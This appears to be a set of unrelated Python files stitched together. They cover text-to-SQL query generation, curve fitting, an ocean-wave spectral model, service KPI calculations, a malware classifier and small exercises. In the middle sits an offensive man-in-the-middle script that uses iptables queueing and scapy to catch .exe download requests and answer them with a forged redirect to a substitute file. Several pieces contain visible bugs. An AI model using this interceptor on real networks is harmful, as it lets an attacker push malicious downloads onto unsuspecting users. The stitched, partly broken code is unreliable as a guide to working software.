"history:{},current_sql:{} stack:{}".format(
history[0], current_sql, stack.items))
print("idx_stack:{}".format(idx_stack))
print("sql_stack:{}".format(sql_stack))
exit(1)
current_sql[kw].append(NEW_WHERE_OPS[vet[2]])
if label == "root":
history[0].append("root")
current_sql[kw].append({})
# current_sql = current_sql[kw][-1]
stack.push(("root", current_sql[kw][-1]))
else:
current_sql[kw].append("terminal")
elif isinstance(vet, tuple) and vet[0] == "des_asc":
current_sql[kw].append(index_to_column_name(vet[1], tables))
current_sql[kw].append(vet[2])
score = self.des_asc.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len,
np.full(
B,
vet[1],
dtype=np.int64))
label = np.argmax(score[0].data.cpu().numpy())
dec_asc, has_limit = DEC_ASC_OPS[label]
history[0].append(dec_asc)
current_sql[kw].append(dec_asc)
current_sql[kw].append(has_limit)
# print("{}".format(current_sql))
if failed:
return None
print("history:{}".format(history[0]))
if len(sql_stack) > 0:
current_sql = sql_stack[0]
# print("{}".format(current_sql))
return current_sql
def gen_col(self, col, table, table_alias_dict):
colname = table["column_names_original"][col[2]][1]
table_idx = table["column_names_original"][col[2]][0]
if table_idx not in table_alias_dict:
return colname
return "T{}.{}".format(table_alias_dict[table_idx], colname)
def gen_group_by(self, sql, kw, table, table_alias_dict):
ret = []
for i in range(0, len(sql)):
# if len(sql[i+1]) == 0:
# if sql[i+1] == "none_agg":
ret.append(self.gen_col(sql[i], table, table_alias_dict))
# else:
# ret.append("{}({})".format(sql[i+1], self.gen_col(sql[i], table, table_alias_dict)))
# for agg in sql[i+1]:
# ret.append("{}({})".format(agg,gen_col(sql[i],table,table_alias_dict)))
return "{} {}".format(kw, ",".join(ret))
def gen_select(self, sql, kw, table, table_alias_dict):
ret = []
for i in range(0, len(sql), 2):
# if len(sql[i+1]) == 0:
if sql[i +
1] == "none_agg" or not isinstance(sql[i +
1], basestring): # DEBUG-ed 20180817
ret.append(self.gen_col(sql[i], table, table_alias_dict))
else:
ret.append("{}({})".format(
sql[i + 1], self.gen_col(sql[i], table, table_alias_dict)))
# for agg in sql[i+1]:
# ret.append("{}({})".format(agg,gen_col(sql[i],table,table_alias_dict)))
return "{} {}".format(kw, ",".join(ret))
def gen_where(self, sql, table, table_alias_dict):
if len(sql) == 0:
return ""
start_idx = 0
andor = "and"
if isinstance(sql[0], basestring):
start_idx += 1
andor = sql[0]
ret = []
for i in range(start_idx, len(sql), 3):
# rewrite to stop a bug
if i + 2 < len(sql):
col = self.gen_col(sql[i], table, table_alias_dict)
op = sql[i + 1]
val = sql[i + 2]
where_item = ""
else:
break
if val == "terminal":
where_item = "{} {} '{}'".format(col, op, val)
else:
val = self.gen_sql(val, table)
where_item = "{} {} ({})".format(col, op, val)
if op == "between":
# TODO temprarily fixed
where_item += " and 'terminal'"
ret.append(where_item)
return "where {}".format(" {} ".format(andor).join(ret))
def gen_orderby(self, sql, table, table_alias_dict):
ret = []
limit = ""
if sql[-1]:
limit = "limit 1"
for i in range(0, len(sql), 4):
if sql[i +
1] == "none_agg" or not isinstance(sql[i +
1], basestring): # DEBUG-ed 20180817
ret.append("{} {}".format(self.gen_col(
sql[i], table, table_alias_dict), sql[i + 2]))
else:
ret.append("{}({}) {}".format(
sql[i + 1], self.gen_col(sql[i], table, table_alias_dict), sql[i + 2]))
return "order by {} {}".format(",".join(ret), limit)
def gen_having(self, sql, table, table_alias_dict):
ret = []
for i in range(0, len(sql), 4):
if sql[i + 1] == "none_agg":
col = self.gen_col(sql[i], table, table_alias_dict)
else:
col = "{}({})".format(
sql[i + 1], self.gen_col(sql[i], table, table_alias_dict))
op = sql[i + 2]
val = sql[i + 3]
if val == "terminal":
ret.append("{} {} '{}'".format(col, op, val))
else:
val = self.gen_sql(val, table)
ret.append("{} {} ({})".format(col, op, val))
return "having {}".format(",".join(ret))
def find_shortest_path(self, start, end, graph):
stack = [[start, []]]
visited = set()
while len(stack) > 0:
ele, history = stack.pop()
if ele == end:
return history
for node in graph[ele]:
if node[0] not in visited:
stack.append((node[0], history + [(node[0], node[1])]))
visited.add(node[0])
print("table {} table {}".format(start, end))
# print("could not find path!!!!!{}".format(self.path_not_found))
self.path_not_found += 1
# return []
def gen_from(self, candidate_tables, table):
def find(d, col):
if d[col] == -1:
return col
return find(d, d[col])
def union(d, c1, c2):
r1 = find(d, c1)
r2 = find(d, c2)
if r1 == r2:
return
d[r1] = r2
ret = ""
if len(candidate_tables) <= 1:
if len(candidate_tables) == 1:
ret = "from {}".format(
table["table_names_original"][list(candidate_tables)[0]])
else:
ret = "from {}".format(table["table_names_original"][0])
# TODO: temporarily settings
return {}, ret
# print("candidate:{}".format(candidate_tables))
table_alias_dict = {}
uf_dict = {}
for t in candidate_tables:
uf_dict[t] = -1
idx = 1
graph = defaultdict(list)
for acol, bcol in table["foreign_keys"]:
t1 = table["column_names"][acol][0]
t2 = table["column_names"][bcol][0]
graph[t1].append((t2, (acol, bcol)))
graph[t2].append((t1, (bcol, acol)))
# if t1 in candidate_tables and t2 in candidate_tables:
# r1 = find(uf_dict,t1)
# r2 = find(uf_dict,t2)
# if r1 == r2:
# continue
# union(uf_dict,t1,t2)
# if len(ret) == 0:
# ret = "from {} as T{} join {} as T{} on T{}.{}=T{}.{}".format(table["table_names"][t1],idx,table["table_names"][t2],
# idx+1,idx,table["column_names_original"][acol][1],idx+1,
# table["column_names_original"][bcol][1])
# table_alias_dict[t1] = idx
# table_alias_dict[t2] = idx+1
# idx += 2
# else:
# if t1 in table_alias_dict:
# old_t = t1
# new_t = t2
# acol,bcol = bcol,acol
# elif t2 in table_alias_dict:
# old_t = t2
# new_t = t1
# else:
# ret = "{} join {} as T{} join {} as T{} on T{}.{}=T{}.{}".format(ret,table["table_names"][t1], idx,
# table["table_names"][t2],
# idx + 1, idx,
# table["column_names_original"][acol][1],
# idx + 1,
# table["column_names_original"][bcol][1])
# table_alias_dict[t1] = idx
# table_alias_dict[t2] = idx + 1
# idx += 2
# continue
# ret = "{} join {} as T{} on T{}.{}=T{}.{}".format(ret,new_t,idx,idx,table["column_names_original"][acol][1],
# table_alias_dict[old_t],table["column_names_original"][bcol][1])
# table_alias_dict[new_t] = idx
# idx += 1
# visited = set()
candidate_tables = list(candidate_tables)
start = candidate_tables[0]
table_alias_dict[start] = idx
idx += 1
ret = "from {} as T1".format(table["table_names_original"][start])
try:
for end in candidate_tables[1:]:
if end in table_alias_dict:
continue
path = self.find_shortest_path(start, end, graph)
prev_table = start
if not path:
table_alias_dict[end] = idx
idx += 1
ret = "{} join {} as T{}".format(
ret, table["table_names_original"][end], table_alias_dict[end], )
continue
for node, (acol, bcol) in path:
if node in table_alias_dict:
prev_table = node
continue
table_alias_dict[node] = idx
idx += 1
ret = "{} join {} as T{} on T{}.{} = T{}.{}".format(
ret,
table["table_names_original"][node],
table_alias_dict[node],
table_alias_dict[prev_table],
table["column_names_original"][acol][1],
table_alias_dict[node],
table["column_names_original"][bcol][1])
prev_table = node
except BaseException:
traceback.print_exc()
print("db:{}".format(table["db_id"]))
# print(table["db_id"])
return table_alias_dict, ret
# if len(candidate_tables) != len(table_alias_dict):
# print("error in generate from clause!!!!!")
return table_alias_dict, ret
def gen_sql(self, sql, table):
select_clause = ""
from_clause = ""
groupby_clause = ""
orderby_clause = ""
having_clause = ""
where_clause = ""
nested_clause = ""
cols = {}
candidate_tables = set()
nested_sql = {}
nested_label = ""
parent_sql = sql
# if "sql" in sql:
# sql = sql["sql"]
if "nested_label" in sql:
nested_label = sql["nested_label"]
nested_sql = sql["nested_sql"]
sql = sql["sql"]
elif "sql" in sql:
sql = sql["sql"]
for key in sql:
if key not in KW_WITH_COL:
continue
for item in sql[key]:
if isinstance(item, tuple) and len(item) == 3:
if table["column_names"][item[2]][0] != -1:
candidate_tables.add(table["column_names"][item[2]][0])
table_alias_dict, from_clause = self.gen_from(candidate_tables, table)
ret = []
if "select" in sql:
select_clause = self.gen_select(
sql["select"], "select", table, table_alias_dict)
if len(select_clause) > 0:
ret.append(select_clause)
else:
print("select not found:{}".format(parent_sql))
else:
print("select not found:{}".format(parent_sql))
if len(from_clause) > 0:
ret.append(from_clause)
if "where" in sql:
where_clause = self.gen_where(
sql["where"], table, table_alias_dict)
if len(where_clause) > 0:
ret.append(where_clause)
if "groupBy" in sql: # DEBUG-ed order
groupby_clause = self.gen_group_by(
sql["groupBy"], "group by", table, table_alias_dict)
if len(groupby_clause) > 0:
ret.append(groupby_clause)
if "orderBy" in sql:
orderby_clause = self.gen_orderby(
sql["orderBy"], table, table_alias_dict)
if len(orderby_clause) > 0:
ret.append(orderby_clause)
if "having" in sql:
having_clause = self.gen_having(
sql["having"], table, table_alias_dict)
if len(having_clause) > 0:
ret.append(having_clause)
if len(nested_label) > 0:
nested_clause = "{} {}".format(
nested_label, self.gen_sql(
nested_sql, table))
if len(nested_clause) > 0:
ret.append(nested_clause)
return " ".join(ret)
def check_acc(self, pred_sql, gt_sql):
pass
|
import numpy as np
from scipy.optimize import leastsq
import pylab as plt
def sinR():
f=open("12_31_15.csv",'r')
lineNum=1
timeA=[]
voltageSet=[]
for line in f:
if lineNum==1:
#station=line.split(",")[0]
#statName=line.split(",")[1]
lineNum+=1
elif lineNum==2:
#time=line.split(",")[0]
#voltage=line.split(",")[1]
timeA.append(line.split(",")[0])
voltageSet.append(line.split(",")[1])
N = 100 # number of data points
t = np.linspace(0, 4*np.pi, N)
data = [1,2,3,4,5,6,7,8,9]
#3.0*np.sin(t+0.001) + 0.5 + np.random.randn(N)
guess_mean = np.mean(data)
guess_std = 3*np.std(data)/(2**0.5)
guess_phase = 0
print data
# we'll use this to plot our first estimate. This might already be good enough for you
data_first_guess = guess_std*np.sin(t+guess_phase) + guess_mean
# Define the function to optimize, in this case, we want to minimize the difference
# between the actual data and our "guessed" parameters
optimize_func = lambda x: x[0]*np.sin(t+x[1]) + x[2] - data
est_std, est_phase, est_mean = leastsq(optimize_func, [guess_std, guess_phase, guess_mean])[0]
# recreate the fitted curve using the optimized parameters
data_fit = est_std*np.sin(t+est_phase) + est_mean
plt.plot(data, '.')
plt.plot(data_fit, label='after fitting')
plt.plot(data_first_guess, label='first guess')
plt.legend()
plt.show()
|
import doublyPeriodic
import numpy as np; from numpy import pi
import time
class model(doublyPeriodic.numerics):
def __init__(
self,
name = "linearizedBoussinesqEquationsExample",
# Grid parameters
nx = 128,
Lx = 2.0*pi,
ny = None,
Ly = None,
# Solver parameters
t = 0.0,
dt = 1.0e-2, # Numerical timestep
step = 0,
timeStepper = "RK4", # Time-stepping method
nThreads = 1, # Number of threads for FFTW
#
# Near-inertial equation params: rotating and gravitating Earth
f0 = 1.0,
kappa = 4.0,
# Friction: 4th order hyperviscosity
waveVisc = 1.0e-4,
waveViscOrder = 2.0,
waveDiff = 1.0e-4,
waveDiffOrder = 2.0,
meanVisc = 1.0e-4,
meanViscOrder = 2.0,
):
# Initialize super-class.
doublyPeriodicModel.__init__(self,
physics = "single-mode hydrostatic Boussinesq equations" + \
" linearized around two-dimensional turbulence",
nVars = 4,
realVars = True,
# Grid parameters
nx = nx,
ny = ny,
Lx = Lx,
Ly = Ly,
# Solver parameters
t = t,
dt = dt, # Numerical timestep
step = step, # Current step
timeStepper = timeStepper, # Time-stepping method
nThreads = nThreads, # Number of threads for FFTW
)
# Physical parameters specific to the Physical Problem
self.name = name
self.f0 = f0
self.kappa = kappa
self.meanVisc = meanVisc
self.meanViscOrder = meanViscOrder
self.waveVisc = waveVisc
self.waveViscOrder = waveViscOrder
self.waveDiff = waveDiff
self.waveDiffOrder = waveDiffOrder
# Initial routines
## Initialize variables and parameters specific to this problem
self._init_parameters()
self._set_linear_coeff()
self._init_time_stepper()
## Default vorticity initial condition: Gaussian vortex
rVortex = self.Lx/20
q0 = 0.1*self.f0 * exp( \
- ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
/ (2*rVortex**2.0) \
)
# Default wave initial condition: uniform velocity.
u, v, p = self.make_plane_wave(4)
self.set_uvp(u, v, p)
self.set_q(q0)
self.update_state_variables()
# Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def describe_physics(self):
print("""
This model solves the Boussinesq equations linearized around \n
a two-dimensional barotropic flow for a single vertical mode. \n
No viscosity or dissipation can be specified, since this is not \n
required to stabilize the wave-field solutions. Arbitrary-order \n
hyperdissipation can be specified for the two-dimensional flow. \n
There are four prognostic variables: the two-dimensional flow,
the two horizontal velocity components u and v, and the pressure
field. The chosen vertical mode is represented by the single \n
parameter kappa, which is the square root of the eigenvalue \n
from the vertical mode eigenproblem.
""")
def _set_linear_coeff(self):
""" Calculate the coefficient that multiplies the linear left hand
side of the equation """
# Two-dimensional turbulent viscosity.
self.linearCoeff[:, :, 0] = self.meanVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)
self.linearCoeff[:, :, 1] = self.waveVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 2] = self.waveVisc \
* (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
self.linearCoeff[:, :, 3] = self.waveDiff \
* (self.KK**2.0 + self.LL**2.0)**(self.waveDiffOrder/2.0)
def _calc_right_hand_side(self, soln, t):
""" Calculate the nonlinear right hand side of PDE """
# Views for clarity:
qh = soln[:, :, 0]
uh = soln[:, :, 1]
vh = soln[:, :, 2]
ph = soln[:, :, 3]
# Physical-space things
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
# Calculate streamfunction
self.psih = -qh / self.divideSafeKay2
# Mean velocities
self.U = -self.ifft2(self.jLL*self.psih)
self.V = self.ifft2(self.jKK*self.psih)
# Mean derivatives
self.Ux = self.ifft2(self.LL*self.KK*self.psih)
self.Uy = self.ifft2(self.LL**2.0*self.psih)
self.Vx = -self.ifft2(self.KK**2.0*self.psih)
# Views to clarify calculation of A's RHS
U = self.U
V = self.V
q = self.q
u = self.u
v = self.v
p = self.p
Ux = self.Ux
Uy = self.Uy
Vx = self.Vx
# Solely nonlinear advection for q
self.RHS[:, :, 0] = - self.jKK*self.fft2(U*q) - self.jLL*self.fft2(V*q)
# Linear terms + advection for u, v, p, + refraction for u, v
# DEBUGGING
# Linear terms only
#self.RHS[:, :, 1] = self.f0*vh - self.jKK*ph
#self.RHS[:, :, 2] = -self.f0*uh - self.jLL*ph
#self.RHS[:, :, 3] = -self.cn**2.0 * ( self.jKK*uh + self.jLL*vh )
# Nonlinear terms only
#self.RHS[:, :, 1] = \
# - self.jKK*self.fft2(U*u) - self.jLL*self.fft2(V*u) \
# - self.fft2(u*Ux) - self.fft2(v*Uy)
#self.RHS[:, :, 2] = \
# - self.jKK*self.fft2(U*v) - self.jLL*self.fft2(V*v) \
# - self.fft2(u*Vx) + self.fft2(v*Ux)
#self.RHS[:, :, 3] = \
# - self.jKK*self.fft2(U*p) - self.jLL*self.fft2(V*p)
# Both?
self.RHS[:, :, 1] = self.f0*vh - self.jKK*ph \
- self.jKK*self.fft2(U*u) - self.jLL*self.fft2(V*u) \
- self.fft2(u*Ux) - self.fft2(v*Uy)
self.RHS[:, :, 2] = -self.f0*uh - self.jLL*ph \
- self.jKK*self.fft2(U*v) - self.jLL*self.fft2(V*v) \
- self.fft2(u*Vx) + self.fft2(v*Ux)
self.RHS[:, :, 3] = -self.cn**2.0 * ( self.jKK*uh + self.jLL*vh ) \
- self.jKK*self.fft2(U*p) - self.jLL*self.fft2(V*p)
self._dealias_RHS()
def _init_parameters(self):
""" Pre-allocate parameters in memory in addition to the solution """
# Divide-safe square wavenumber
self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
self.divideSafeKay2[0, 0] = float('Inf')
# Mode-n wave speed:
self.cn = self.f0 / self.kappa
# Vorticity and wave-field amplitude
self.q = np.zeros(self.physVarShape, np.dtype('float64'))
self.u = np.zeros(self.physVarShape, np.dtype('float64'))
self.v = np.zeros(self.physVarShape, np.dtype('float64'))
self.p = np.zeros(self.physVarShape, np.dtype('float64'))
# Streamfunction transform
self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))
# Mean and wave velocity components
self.U = np.zeros(self.physVarShape, np.dtype('float64'))
self.V = np.zeros(self.physVarShape, np.dtype('float64'))
self.Ux = np.zeros(self.physVarShape, np.dtype('float64'))
self.Uy = np.zeros(self.physVarShape, np.dtype('float64'))
self.Vx = np.zeros(self.physVarShape, np.dtype('float64'))
def update_state_variables(self):
""" Update diagnostic variables to current model state """
# Views for clarity:
qh = self.soln[:, :, 0]
uh = self.soln[:, :, 1]
vh = self.soln[:, :, 2]
ph = self.soln[:, :, 3]
# Streamfunction
self.psih = - qh / self.divideSafeKay2
# Physical-space PV and velocity components
self.q = self.ifft2(qh)
self.u = self.ifft2(uh)
self.v = self.ifft2(vh)
self.p = self.ifft2(ph)
self.U = -self.ifft2(self.jLL*self.psih)
self.V = self.ifft2(self.jKK*self.psih)
def set_q(self, q):
""" Set model vorticity """
self.soln[:, :, 0] = self.fft2(q)
self.soln = self._dealias_array(self.soln)
self.update_state_variables()
def make_plane_wave(self, kNonDim):
""" Set linearized Boussinesq to a plane wave in x with speed 1 m/s
and normalized wavenumber kNonDim """
# Dimensional wavenumber and dispersion-relation frequency
kDim = 2.0*pi/self.Lx * kNonDim
sigma = self.f0*sqrt(1 + kDim/self.kappa)
# Wave field amplitude.
#alpha = sigma**2.0 / self.f0**2.0 - 1.0
a = 1.0
# A hydrostatic plane wave. s > sqrt(s^2+f^2)/sqrt(2) when s>f
p = a * (sigma**2.0-self.f0**2.0) * cos(kDim*self.XX)
u = a * kDim*sigma * cos(kDim*self.XX)
v = a * kDim*self.f0 * sin(kDim*self.XX)
return u, v, p
def set_uvp(self, u, v, p):
""" Set linearized Boussinesq variables """
self.soln[:, :, 1] = self.fft2(u)
self.soln[:, :, 2] = self.fft2(v)
self.soln[:, :, 3] = self.fft2(p)
self.soln = self._dealias_array(self.soln)
self.update_state_variables()
def plot_current_state(self):
""" Create a simple plot that shows the state of the model."""
# Figure out how to do this efficiently.
import matplotlib.pyplot as plt
self.update_state_variables()
# Initialize colorbar dictionary
colorbarProperties = {
'orientation' : 'vertical',
'shrink' : 0.8,
'extend' : 'neither',
}
self.fig = plt.figure('Hydrostatic wave equation',
figsize=(8, 4))
ax1 = plt.subplot(121)
plt.pcolormesh(self.xx, self.yy, self.q, cmap='RdBu_r')
plt.axis('square')
ax2 = plt.subplot(122)
plt.pcolormesh(self.xx, self.yy, sqrt(self.u**2.0+self.v**2.0))
plt.axis('square')
def describe_model(self):
""" Describe the current model state """
print("\nThis is a doubly-periodic spectral model for \n" + \
"{:s} \n".format(self.physics) + \
"with the following attributes:\n\n" + \
" Domain : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
" Resolution : {:d} X {:d}\n".format(self.nx, self.ny) + \
" Timestep : {:.2e} s\n".format(self.dt) + \
" Current time : {:.2e} s\n\n".format(self.t) + \
"The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
|
from decimal import Decimal
from functools import total_ordering
import re
import itertools
from datetime import date
from dateutil.relativedelta import relativedelta
from helper import keyify, as_number
class Service:
EXPECTED_QUARTERS = [
# worked through oldest to newest to calculate %age changes
'2012_q4',
'2013_q1',
'2013_q2',
'2013_q3',
'2013_q4',
'2014_q1',
'2014_q2',
'2014_q3',
]
COVERAGE_ATTRIBUTES = ['vol', 'digital_vol', 'cpt']
# A marker used in the spreadsheet to show that a metric was not requested
NOT_REQUESTED_MARKER = '***'
def __init__(self, details):
for key in details:
setattr(self, keyify(key), details[key])
self.has_kpis = False
self.calculate_quarterly_kpis()
self.keywords = self._split_keywords(details)
def calculate_quarterly_kpis(self):
self.kpis = []
previous_quarter = None
self.has_previous_quarter = False
for quarter in self.EXPECTED_QUARTERS:
volume = as_number(self['%s_vol' % quarter])
if volume is None:
continue
digital_volume = as_number(self['%s_digital_vol' % quarter])
if digital_volume == 0:
takeup = 0
elif digital_volume is not None and volume is not None:
takeup = digital_volume / volume
else:
takeup = None
cost_per_transaction = as_number(self['%s_cpt' % quarter])
if cost_per_transaction is not None:
cost = cost_per_transaction * volume
else:
cost = None
data = {
'quarter': Quarter.parse(quarter),
'takeup': takeup,
'cost': cost,
'volume': self['%s_vol' % quarter],
'volume_num': volume,
'digital_volume': self['%s_digital_vol' % quarter],
'digital_volume_num': digital_volume,
'cost_per': self['%s_cpt' % quarter],
'cost_per_number': cost_per_transaction,
'cost_per_digital': self['%s_digital_cpt' % quarter],
'completion': self['%s_completion_rate' % quarter],
'satisfaction': self['%s_user_satisfaction' % quarter],
}
def change_factor(previous, current):
factor = None
if current is not None and previous is not None and previous != 0:
factor = current / previous
return factor
if previous_quarter is not None:
self.has_previous_quarter = True
data['volume_change'] = change_factor(previous_quarter['volume_num'], volume)
data['takeup_change'] = change_factor(previous_quarter['takeup'], takeup)
data['cost_per_change'] = change_factor(previous_quarter['cost_per_number'], cost_per_transaction)
data['cost_change'] = change_factor(previous_quarter['cost'], cost)
data['previous_quarter'] = previous_quarter['quarter']
previous_quarter = data
self.kpis.append(data)
self.has_kpis = True
@property
def name(self):
return re.sub('\s*$', '', self.name_of_service)
@property
def body(self):
return self.agency_body
@property
def agency_abbreviation(self):
if self.agency_abbr is None or len(self.agency_abbr) == 0:
return self.body
else:
return self.agency_abbr
@property
def description(self):
return re.sub('\s*$', '', self.description_of_service)
def latest_kpi_for(self, attribute):
latest_kpis = self._most_recent_kpis
if latest_kpis is None:
return None
else:
return latest_kpis.get(attribute)
@property
def _most_recent_kpis(self):
if len(self.kpis) > 0:
return self.kpis[-1]
@property
def data_coverage(self):
def is_requested(attr):
return str(self[attr]).lower() != self.NOT_REQUESTED_MARKER
def is_provided(attr):
return as_number(self[attr]) is not None
all_attrs = map('_'.join, itertools.product(
self.EXPECTED_QUARTERS, self.COVERAGE_ATTRIBUTES))
all_requested = filter(is_requested, all_attrs)
all_provided = filter(is_provided, all_requested)
return Coverage(len(all_provided), len(all_requested))
def _attributes_present(self, kpi, attrs):
return all(kpi[attr] is not None for attr in attrs)
def find_recent_kpis_with_attributes(self, attrs):
return next((kpi for kpi in reversed(self.kpis)
if self._attributes_present(kpi, attrs)),
None)
@property
def slug(self):
return slugify('%s-%s' % (self.abbr, self.name))
@property
def link(self):
return '%s/%s' % ('service-details', self.slug)
@property
def has_details_page(self):
return self.detailed_view == 'yes'
@property
def most_up_to_date_volume(self):
most_recent_yearly_volume = None
if self.has_kpis:
most_recent_yearly_volume = self.latest_kpi_for('volume_num')
return most_recent_yearly_volume
def historical_data_before(self, quarter, key):
previous_kpis = filter(lambda k: k['quarter'] < quarter, self.kpis)
if key == 'cost_per_number' or key == 'cost':
# Don't return cost_per_number or cost if cost_per_number is not provided
previous_kpis = [elem for elem in previous_kpis if elem['cost_per_number'] is not None]
elif key == 'takeup':
# Don't return takeup value if digital_volume_num is not provided
previous_kpis = [elem for elem in previous_kpis if elem['digital_volume_num'] is not None]
key_data = lambda k: {'quarter': k['quarter'], 'value': k.get(key)}
return map(key_data, reversed(previous_kpis))
def __getitem__(self, key):
return getattr(self, key)
def _split_keywords(self, details):
if not details['Keywords']:
return []
return [x.strip() for x in details['Keywords'].split(',')]
@total_ordering
class Quarter:
def __init__(self, year, quarter):
self.year = year
self.quarter = quarter
def __str__(self):
if self.year == 2012 and self.quarter == 4:
# Exception for Q4 2012
return "%s to %s" % (self.format_date(date(2011, 4, 1)), self.format_date(date(2012, 3, 1)))
q = self.quarter * 3
end_date = date(self.year, q, 1) - relativedelta(months=3)
start_date = end_date - relativedelta(months=11)
return "%s to %s" % (self.format_date(start_date), self.format_date(end_date))
def __lt__(self, quarter):
return (self.year, self.quarter) < (quarter.year, quarter.quarter)
def __eq__(self, quarter):
return (self.year, self.quarter) == (quarter.year, quarter.quarter)
def __repr__(self):
return '<Quarter year=%s quarter=%s>' % (self.year, self.quarter)
month_abbreviations = [
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'June',
'July', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec'
]
@classmethod
def format_date(cls, date):
return "%s %s" % (cls.month_abbreviations[date.month - 1], date.strftime('%Y'))
@classmethod
def parse(cls, str):
m = re.match('(\d\d\d\d)_q(\d)', str)
return Quarter(int(m.group(1)), int(m.group(2)))
class Coverage(object):
def __init__(self, provided, requested):
self.provided = provided
self.requested = requested
@property
def percentage(self):
return Decimal(self.provided) / Decimal(self.requested)
def __add__(self, other):
return Coverage(self.provided + other.provided, self.requested + other.requested)
|
#!/usr/bin/env python
#must run iptables -I INPUT -j NFQUEUE --queue-num 0 (use for packets whose destination is your computer)
#must run iptables -I OUTPUT -j NFQUEUE --queue-num 0 (use for packets whose source is your computer)
#>> must run iptables -I FORWARD -j NFQUEUE --queue-num 0 (use for packets being routed through your computer)
#>> in terminal: echo 1 > /proc/sys/net/ipv4/ip_forward
#can clear with iptables --flush
import netfilterqueue
import scapy.all as scapy
ack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[scapy.Raw].load:
print(".exe request detected!")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing .exe file")
modified_packet = set_load(scapy_packet, scapy_packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: http://www.example.com\n") #edit location of alternate file here
packet.set_payload(str(modified_packet))
packet.accept() #let packet out of queue
queue.netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run() |
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
datasets = pd.read_csv('/home/aman/kans/work_folder/malware456.csv')
Y = datasets.iloc[:, 456].values
X = datasets.iloc[:, 0:456].values
from sklearn.model_selection import train_test_split
X_Train, X_Test, Y_Train, Y_Test = train_test_split(X, Y, test_size = 0.25, random_state = 0)
from sklearn.ensemble import RandomForestClassifier
classifier = RandomForestClassifier(n_estimators = 200, criterion = 'entropy', random_state = 0)
classifier.fit(X_Train,Y_Train)
Y_Pred = classifier.predict(X_Test)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(Y_Test, Y_Pred)
from sklearn.metrics import accuracy_score
accuracy_score(Y_Test, Y_Pred)
print('Accuracy of Random Forestclassifier on training set: {:.2f}'
.format(classifier.score(X_Train, Y_Train)))
print('Accuracy of Random Forest classifier on test set: {:.2f}'
.format(classifier.score(X_Test, Y_Test)))
|
def longestPeak(array):
longestPeak = 0
i = 1
while i < len(array)-1:
left = array[i-1]
curr = array[i]
right = array[i+1]
peakFound = left < curr and curr > right
if not peakFound:
i += 1
continue
leftIdx = i - 2
while leftIdx >= 0 and array[leftIdx] < array[leftIdx+1]:
leftIdx -= 1
rightIdx = i + 2
while rightIdx < len(array) and array[rightIdx] < array[rightIdx-1]:
rightIdx += 1
currPeakLength = rightIdx - leftIdx - 1
longestPeak = max(currPeakLength, longestPeak)
i = rightIdx
return longestPeak
|
number = 2 + 3 * 4 #14
print(number)
number = number + 2 #16
print(number)
number += 2 # 18
print(number)
number *= 2 # 36
print(number)
number /= 2 # 18
print(number)
number -= 2 # 16
print(number)
number %= 2
print(number) |
#!/bin/python2
### This ncfile is set up to compare the Mass Extinction Coefficients with
### internal vs. external mixing
from netCDF4 import Dataset
import numpy as np
#import scipy.ndimage
#import types
import sys as sys
### Read data files
volspkd = 10
# Open netCDF file
ncfile_3im = 'bcm-sul-oc-im.nc'
ncfile_2im = 'bcm-sul-im-oc-em.nc'
ncfile_3cs = 'bcm-sul-oc-coat.nc'
ncfile_2cs = 'bcm-sul-coat-oc-em.nc'
fh_3im = Dataset(ncfile_3im, 'r')
fh_2im = Dataset(ncfile_2im, 'r')
fh_3cs = Dataset(ncfile_3cs, 'r')
fh_2cs = Dataset(ncfile_2cs, 'r')
# Read in coordinates
wl_orig = fh_3im.variables['wl'][:]
vols_orig = fh_3im.variables['vols'][:]
volo_orig = fh_3im.variables['volo'][:]
rh_orig = fh_3im.variables['RH'][:]
wlpkd = 0.55 # choose the wavelength at 550nm to represent shortwave radiation
wlpkdind = np.where((wl_orig >= wlpkd-0.02) & (wl_orig <= wlpkd+0.02))[0].item()
# Read in data
mec_3im_orig = fh_3im.variables['beta_e'][:][:][:]
mec_2im_orig = fh_2im.variables['beta_e'][:][:][:]
mec_3cs_orig = fh_3cs.variables['beta_e'][:][:][:]
mec_2cs_orig = fh_2cs.variables['beta_e'][:][:][:]
ssa_3im_orig = fh_3im.variables['ssa'][:][:][:]
ssa_2im_orig = fh_2im.variables['ssa'][:][:][:]
ssa_3cs_orig = fh_3cs.variables['ssa'][:][:][:]
ssa_2cs_orig = fh_2cs.variables['ssa'][:][:][:]
g_3im_orig = fh_3im.variables['g'][:][:][:]
g_2im_orig = fh_2im.variables['g'][:][:][:]
g_3cs_orig = fh_3cs.variables['g'][:][:][:]
g_2cs_orig = fh_2cs.variables['g'][:][:][:]
# Calculate the index
rhpkd = np.array([30,60,80,90,94])
rhpkdind = [np.where( rh_orig == s )[0].item() for s in rhpkd]
volspkdind = np.where( vols_orig == volspkd )[0].item()
volopkd = np.array([70,80,90,94,98])
volopkdind = [np.where( volo_orig == s )[0].item() for s in volopkd]
print 'vol_OC = '+str(volo_orig[volopkdind])
